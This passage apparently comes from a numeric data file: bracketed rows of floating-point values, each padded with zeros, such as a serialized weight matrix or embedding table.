-0.174121, -0.464932, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-2.23541, -0.458402, -0.319774, -0.0633092, 0.54659, 0.0985179, -1.11078, -1.31025, 0.143288, -0.711395, -0.197578, -0.416182, -0.171095, -1.06508, 0.469443, -0.925066, 0.110559, 0.0497869, 0.586375, -0.0177624, -0.58786, 0.888857, -0.520054, 0.907125, 0.622783, 0.978324, -0.45547, -0.427055, 0.436649, 0.238284, 0.473012, 0.154228, 0.427761, -0.833591, -0.151238, -0.0631209, -1.86869, 0.601082, -1.57332, -0.748514, -0.288454, -0.170216, 0.377991, 0.50398, 0.40884, 0.00535796, -0.695899, 0.0208394, 0.753034, -0.132631, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.605307, 0.342678, -1.00909, 0.569165, -0.383039, 0.509523, 0.156161, -0.611943, 1.03024, -0.868851, 1.1727, -1.41379, -0.690441, 0.0681866, -0.138408, 0.943524, -0.24028, 0.545333, -0.452705, -0.0122658, -0.30984, 0.350799, -0.0267231, -0.971671, 0.447978, 0.36008, 0.22988, 0.399402, -0.643716, -0.362943, 0.972768, 1.10395, 0.349803, -0.181774, -0.0370613, 0.425544, 1.28197, -0.279878, -0.848611, -0.0508956, -0.872622, -0.730939, 0.480184, -0.285616, 0.939667, 0.492958, 0.053389, -0.0118824, -0.587805, -0.398562, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.405345, -0.338088, 0.614009, 0.210703, -0.00827776, -0.200165, -0.631591, 0.37722, 0.952167, -0.920535, 0.775159, -0.193896, -0.0435035, -0.213291, -1.80015, 0.145137, -0.802842, -0.0567691, -0.265722, 0.0363699, -0.293597, 0.434843, -0.0333999, -0.258374, 0.70304, -0.117573, -0.112863, -0.310153, 0.10961, -0.194365, -0.106663, -0.0439327, 0.325925, -0.435418, 0.123166, 0.436552, -0.0104613, -0.294266, -0.0171192, 0.12669, 0.894581, 0.244453, 0.310829, -0.0261443, -0.00525678, 0.0858039, 0.191185, 0.0477699, 0.212174, -0.073139, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.667115, 0.272085, 2.06603, 0.304316, 0.786943, 0.659822, -1.28775, 0.204636, -0.251649, 0.507715, -2.504, 0.0779536, -0.0657514, 0.239782, 1.28622, 1.4322, 0.592515, 0.140892, -0.0102873, -0.0289341, 0.128416, -0.450707, -0.854043, -1.07011, -1.37047, -0.0921964, -0.635011, -1.15659, -0.353333, 0.234242, -0.459152, -0.988332, -2.05516, 1.13126, -1.32933, 0.100817, 0.729941, 1.04416, 0.625432, 1.92998, -0.666949, 0.822895, -0.526359, -0.765458, 0.428089, -0.490093, -0.540448, 0.00322234, -0.112692, -0.0886127, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00977216, -0.342523, -0.0872946, 0.0230972, -0.323026, -0.298662, 0.201942, -0.353832, 0.115654, 0.344209, -0.552985, 0.321902, -0.419788, 0.522262, 0.187418, -0.27261, 1.09003, -0.263803, 0.470332, 0.0192327, 0.36049, 0.767469, 0.101505, -0.512296, 0.986824, 0.88444, -0.471179, -0.437218, -0.284961, -0.219898, -0.306688, -0.127035, 0.408768, -0.00262403, -0.205742, -0.087375, -0.215254, 0.049764, -0.0664017, 0.416739, -0.0321448, -0.0800622, -0.129858, 0.242438, 0.0559172, -0.479419, -0.216971, -0.0451983, 0.44502, 0.775423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.5381, 0.152444, -0.518378, 0.266488, -0.33612, 0.311189, 0.273686, 0.634266, 0.163662, -0.0881277, 1.44311, 0.4774, -0.254491, 0.47253, 0.729854, 0.505351, 0.79011, -0.622607, 0.288186, -0.0220575, 0.0155291, -0.0967892, -0.145973, -0.626459, 1.82057, 0.575281, 0.0760229, -0.0370475, 0.755401, 0.203729, 1.08302, 0.866553, 0.917021, -0.0202721, -0.0860918, -0.516556, 0.236194, -0.473561, 0.0311525, 0.688991, -0.154321, -0.401835, -0.0973801, -0.115584, 0.180103, 0.471343, 0.369985, 0.00893261, -0.207877, -0.546421, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.199686, -0.0468696, -0.248863, 0.0687756, 0.109249, -0.0485577, 0.229045, 0.141679, -0.157866, -0.267454, 0.411094, -0.243498, -0.136858, -0.227627, -0.109358, -0.600469, 0.100117, -0.208292, 0.580127, 0.0427373, 0.166702, -0.225622, -0.0384125, 0.0517869, 0.236266, 0.287142, -0.865247, -0.331421, 0.0532353, -0.116743, -0.135779, 0.268757, 0.280862, 0.0476134, 0.351076, 0.104664, 0.169813, 0.15816, 0.117862, 0.0739293, 0.120841, 0.00574131, -0.121106, -1.41991, 0.325678, -0.0889758, 0.00822857, -0.017383, -0.289849, 0.0415902, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0274636, 0.212535, 0.262578, 0.0758312, 0.156597, 0.0512809, -0.0235887, 0.282179, 0.400617, 1.05628, -0.0701181, -0.197562, 0.0215339, -0.35166, 0.136636, -0.295315, 0.209285, -0.0632509, -1.35929, 0.0275848, -0.32344, 0.0316989, -0.0290122, 0.154666, -1.01932, 0.633542, -0.0269311, -0.527212, 0.0591076, 0.038704, -0.181629, -0.519363, 0.372357, -0.0966934, 0.0614291, 0.322659, 0.186362, -0.0171104, -0.0357704, 0.356423, -0.316942, -0.249282, 0.0663134, -0.143419, 0.563067, -0.0990355, -0.157202, -0.0411924, 0.170868, 0.275753, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.352598, 0.175683, 0.4993, 0.0693423, 0.140148, -0.156257, 0.0642121, -0.422796, 0.171631, 0.711817, -0.409707, 1.32868, 0.128552, 0.174651, 0.0449173, 0.0969203, -0.314001, -0.0599927, 0.091328, -0.0295815, 0.115981, 0.203632, -0.0623232, 0.0947363, -0.378381, 0.431889, -0.122662, 0.633276, 0.921544, -0.0238261, 0.329459, -0.227433, -0.25093, -0.107661, 0.0981795, -0.302093, -0.124267, 0.224445, -0.200082, -0.236294, 0.0683952, -0.278303, -0.0632587, -0.0602085, 0.167785, -0.624224, 0.0874415, 0.012192, -0.0591805, -0.826848, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.474551, 0.1754, 0.224568, -0.0534589, -0.0647308, 0.486298, -0.0113396, -0.00823785, 0.270267, -0.752251, 0.037383, -3.79938, -0.0753188, -0.724909, 0.00963233, 0.61389, -0.556213, 0.903574, -0.245728, -0.00132753, -0.195621, 0.144236, -0.00425432, 0.102586, -0.627785, -0.97428, -0.113961, -0.144736, -0.461996, 0.230518, 0.0353598, -0.601188, -0.214671, -0.0520341, -0.295305, 0.461066, 0.0584576, 0.108117, -0.223926, 0.459336, -0.394309, -0.05931, 0.242234, -0.246367, 0.615051, 0.0480675, 0.0331153, -0.017699, 0.199287, -0.0198854, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.378866, 0.119511, 0.759654, 0.473347, 0.327117, 0.0602863, 0.465428, -0.0477588, -1.10636, -0.840885, 0.996421, -1.37086, 0.248669, 0.137678, -0.0285648, 0.205375, -0.826598, 0.538384, 0.24211, -0.0157577, 0.391042, -0.571886, 0.219781, 0.298648, -1.71906, -0.436983, 0.391508, 0.992503, 0.378992, 0.519142, -1.54716, -0.361045, -0.757864, -0.386037, -0.00149885, -1.13833, 0.0310359, 0.0954513, -0.342938, 0.196976, 0.172854, -0.0837823, 0.174551, -0.901511, -0.00674744, -1.03391, 0.341731, 0.029745, -0.00127203, -2.39378, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.602261, 0.340364, -0.281864, 0.109726, 0.194238, 0.147549, -0.824819, -0.000938134, 0.0117072, -0.5284, 0.854359, -0.145425, -0.235794, -0.0985602, 0.025123, 0.686417, -0.509701, 0.459821, 0.0916296, 0.0038179, 0.0751452, -0.374089, 0.362093, 0.341907, -0.610804, -0.444818, 0.459927, -0.0788684, 0.0581982, -0.102356, 0.262421, 0.424248, 0.0636367, 0.00271719, 0.130094, -0.183785, 0.0719449, 0.458673, -0.58176, -0.243737, 0.224754, -0.243209, 0.485908, -0.743969, -0.0912507, -0.295317, 0.396835, 0.00601381, 0.595125, 0.18436, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.748403, -0.636772, -2.16349, -0.205706, -0.780755, -1.20756, 0.639786, 0.627262, -0.0241441, -1.28659, -0.404626, -0.127775, -0.424341, 1.43805, -0.885656, 0.543801, 0.541701, -1.05881, -0.653064, -0.0417738, 0.324252, -1.36274, -0.575038, -8.53475, 0.749136, 0.788073, 1.43796, 0.10888, -0.205932, 0.177382, 0.844831, -0.321259, 1.52147, 0.525308, -0.293, -0.565865, -0.742914, -0.206844, -0.29799, -0.509172, -14.1563, 0.219941, -0.874053, -0.372685, 0.0370511, 1.05929, 0.150817, 0.032222, -0.0682674, -0.29665, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.124741, -0.162926, 0.170552, 0.328912, 0.0669338, 0.156576, -0.257625, -0.0531151, 0.352068, 0.169212, -0.0182598, 0.528942, -0.0779359, 0.155586, -0.0530677, -0.156831, 0.0738825, -0.346359, -0.0307599, -0.017846, 0.115668, -0.285405, -0.0470935, 0.0752342, -0.108558, 0.0193448, -0.0185526, -0.312935, 0.123768, 0.0695548, 0.116973, 0.0987867, 0.0791165, 0.185121, -0.0299353, 0.296564, 0.04187, -0.0909792, -0.094228, -0.0635512, 0.0495894, -0.16118, 0.0569596, 0.289036, -0.0693617, 0.386388, 0.105208, 0.014434, 0.207483, -0.0272354, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.022474, 0.235287, -0.00244008, 0.235307, -0.312756, 0.216859, -0.21195, 0.143821, 0.0453539, 0.0774843, 0.533602, 0.0781961, -0.127602, -0.111669, 0.0441877, -0.199833, 0.387378, 0.171377, -0.0539647, -0.0116704, 0.216837, 0.336169, -0.191136, -0.056444, -0.0918126, -0.0871454, -0.191685, -0.0875547, -0.0195604, -0.0454604, 0.153692, 0.0835261, 0.0435516, 0.0498551, 0.0846846, -0.0676435, 0.316315, -0.271633, 0.164263, 0.0954315, -0.231237, -0.297758, -0.0370829, -0.340845, 0.0953337, 0.00255785, -0.0391291, -0.0103593, -0.172753, -0.0876668, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.65839, -0.268514, -0.415726, -0.385764, -0.0920057, 0.349136, -1.46134, 0.937033, -0.31198, 1.93159, -1.58408, 0.461003, 0.226604, -0.438775, 0.065208, -1.65409, 1.66776, -0.488228, -0.22068, 0.0494186, -0.681928, 1.43588, -0.318333, -0.533017, 0.921669, 0.342468, -0.368655, 0.722269, -0.17002, -0.710636, 0.231924, -2.61649, -0.173347, 0.198605, 0.951148, 0.743259, -0.0409588, -1.71718, -1.06482, 0.112392, 0.846093, -0.640338, -0.391106, 0.316363, 0.972669, -1.09461, -0.680755, -0.0284211, -1.4638, 0.768668, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.23733, -0.101165, 0.889848, -6.52041, -1.65906, -0.855736, -0.317789, 1.5312, -0.918091, 2.70647, -0.264735, 1.04403, 0.526854, 0.671854, 1.23744, 0.191285, -0.121167, -1.54639, 0.388371, 0.0255405, -0.782519, 3.89872, 0.687486, -0.455295, -0.0177547, 0.349858, 0.318582, -0.856809, 0.503059, 0.742881, -0.632954, -0.949051, -2.30582, -0.814793, 0.479076, -0.355939, -0.543608, 0.222556, -0.806105, -0.369808, 0.663737, -0.0942454, -0.170493, -1.99632, -2.70297, -0.0341367, -0.875875, -0.031595, -0.215703, -2.3129, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0550891, -0.0224943, -0.0622061, -0.180562, 0.0120773, -0.00936254, 0.056982, 0.219266, -0.00341622, -0.0156384, -0.0508868, 0.286212, -0.0620782, -0.134647, 0.138551, -0.184282, -0.153711, -0.17806, -0.20755, -0.0176937, 0.025214, 0.283303, -0.158772, -0.0791035, 0.269124, 0.0119783, -0.144684, -0.0763744, 0.0436833, -0.213378, -0.00247521, 0.456591, 0.189497, -0.0156866, -0.0295005, -0.0234373, -0.0999273, 0.0249284, 0.165312, 0.0362619, 0.127952, -0.10286, -0.171889, -0.0592073, -0.364682, 0.364585, -0.00258498, -0.0270025, -0.126934, 0.0734512, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.325453, 0.143056, 0.279404, -0.435766, 0.158735, -0.0589792, 0.576084, -0.0931796, -0.505909, 0.236991, -0.663749, -0.374276, -0.0838953, 0.119638, -0.142504, 0.251342, -0.140083, -0.16247, 0.390923, -0.039304, 0.00170326, -0.2475, 0.197728, 0.14043, 0.0115669, -0.369747, 0.0879365, -0.0259219, -0.673674, -0.0861135, -0.710569, 1.11063, -0.079178, -0.0128023, -0.224507, -0.326976, -0.392109, -0.594843, -0.00207398, -0.487741, -0.210719, 0.0861112, 0.0942854, 0.343088, 0.43921, -0.225662, 0.0444574, -0.0193008, 0.452509, 1.04528, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.603652, -0.0582643, -0.119465, 0.348017, -0.164347, 0.433565, -0.874386, -0.731428, -0.907185, -1.23778, 1.50107, -2.73878, -0.0566513, 1.04193, 0.574915, -0.0406978, -1.20908, 0.529825, 1.64847, -0.0171819, -0.147332, 0.0717936, -0.0300766, 0.302866, 0.906337, -3.55731, -0.810585, -0.149828, -1.6091, -0.707194, 0.0339607, 1.60526, -0.572666, -0.351652, -0.0019823, -0.316028, 1.10957, -0.869783, -0.354948, -0.234748, 0.486653, 0.368461, 0.508104, 0.272281, -6.60046, -0.283617, 0.465647, 0.0256762, 0.255826, -0.340032, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.062351, -0.177152, -0.404799, 0.0295261, -0.0703788, 0.0234803, -0.341069, -0.0763415, 0.0318256, 0.0936421, -0.0928283, -0.0349344, -0.169364, -0.0699109, 0.476759, -0.0828952, 0.228247, -0.0391308, 0.178382, 0.0022318, -0.258059, 0.298705, 0.157171, -0.156554, 0.279488, 0.272931, 0.0612662, -0.215012, -0.210551, 0.0833694, 0.18352, -0.0361832, 0.224509, 0.139065, 0.0745194, 0.289014, -0.0765317, 0.486983, -0.0691808, -0.262537, -0.225232, 0.179907, -0.165886, -0.139819, -0.338371, 0.323547, 0.122383, -0.0278158, -0.081034, -0.292421, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.508427, -0.124275, -0.0867165, 0.354505, -1.09316, 0.0196925, -0.134485, -0.501109, -0.21509, 0.122663, -0.31624, -0.386874, 0.109047, -0.231796, -1.02438, 0.0751964, 0.252371, -0.0811082, 0.0599882, 0.028732, -0.0669159, -0.339303, -0.0210554, 0.271696, 0.0751932, 0.0353524, 0.344054, -0.180746, -0.0715953, 0.23854, 0.161234, -0.0656802, -0.576674, -0.0965278, -0.52024, -0.0924975, 0.420706, 0.0808923, -0.266712, 0.0272718, -0.299912, -0.482643, 0.0284087, 0.182375, 0.40949, 0.262549, -0.334968, 0.00815188, -0.444624, -0.296792, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.282334, -0.0569569, 0.0528054, 0.382469, 0.52649, -0.155319, -0.202552, 0.414113, 0.14626, -0.0126211, -1.09038, -0.471215, -0.112372, 0.132039, 0.133998, -0.413003, 0.121597, 0.36507, -0.238511, -0.0472868, 0.470372, -0.10494, -0.0280033, -0.136032, -0.138553, -0.446243, 0.200626, -0.415288, 0.119994, -0.240411, -0.636612, -0.840083, -0.777176, -0.576848, 0.165343, -0.281037, 0.427433, -1.88837, 0.0778203, -0.0162863, 0.158633, 0.372961, -0.436342, 0.567338, 0.489186, -0.421379, -0.137374, 0.0221045, 0.133323, -0.129448, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.366222, -0.10395, -0.34603, 0.520252, -0.230381, 0.298069, -0.686636, -0.414843, -0.269338, 0.361321, 1.40693, -0.566339, -0.0727639, 0.766474, -0.0350154, 0.322129, 0.764387, 0.720203, -0.450675, 0.0303459, 0.533235, -0.500824, -0.357372, -1.10112, -0.0098252, 0.334337, 0.321741, 0.536346, -0.259435, -0.529117, -0.560165, -0.0291179, -0.337819, -0.455375, -0.181991, 0.0438639, 0.787007, -1.41074, 0.108745, 1.212, -2.19863, -0.200723, 0.523096, -0.0616652, 0.187049, -0.08937, 0.531759, -0.0442423, 0.200114, -0.546411, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.520737, -0.176785, 0.254045, -0.32638, 0.246891, 0.301375, -0.145712, -0.374463, 0.202509, -0.172363, -0.168382, -0.363204, 0.0627762, 0.0952615, 0.73736, -0.693804, 0.263089, -0.0234419, 0.159914, 0.0270274, 0.237174, 0.544743, -0.266163, -0.357387, 0.0081816, -0.314011, -0.103174, -0.0811156, -0.308056, -0.34669, 0.693405, 0.698153, -0.154509, 0.0875965, -0.0242145, 0.602263, -0.589097, 0.282018, -0.0843388, 0.281944, -0.328064, -0.126423, 0.188118, -0.0367329, -0.237476, 0.164019, -0.0511404, -0.0181719, -0.182414, 0.535811, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0279318, -0.0610613, -0.0101412, -0.0552915, 0.0404394, -0.0573593, 0.00620857, -0.00222377, 0.0238538, -0.0148151, 0.0015523, -0.0367412, 0.0162746, 0.0211872, 0.00490808, 0.00470154, 0.0424634, -0.0241571, -0.00655395, 0.0282217, -0.0546177, -0.0318534, -0.0282441, -0.0324262, 0.013002, -0.0200125, 0.0185364, -0.0112108, -0.0334813, -0.0131698, -0.0173139, 0.0150257, -0.0391308, 0.017266, 0.00879118, 0.0263917, -0.00260935, -0.0124847, 0.0109101, -0.0547726, -0.0533904, -0.0669221, -0.0383629, 0.0244426, -0.00324389, -0.00702762, -0.045072, 0.0306992, 0.0109265, 0.0225712, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.124486, -0.114356, -0.213392, 1.41302, -0.673417, -0.233246, 0.370673, -0.314506, 0.594128, -0.255665, -0.315504, 0.31592, 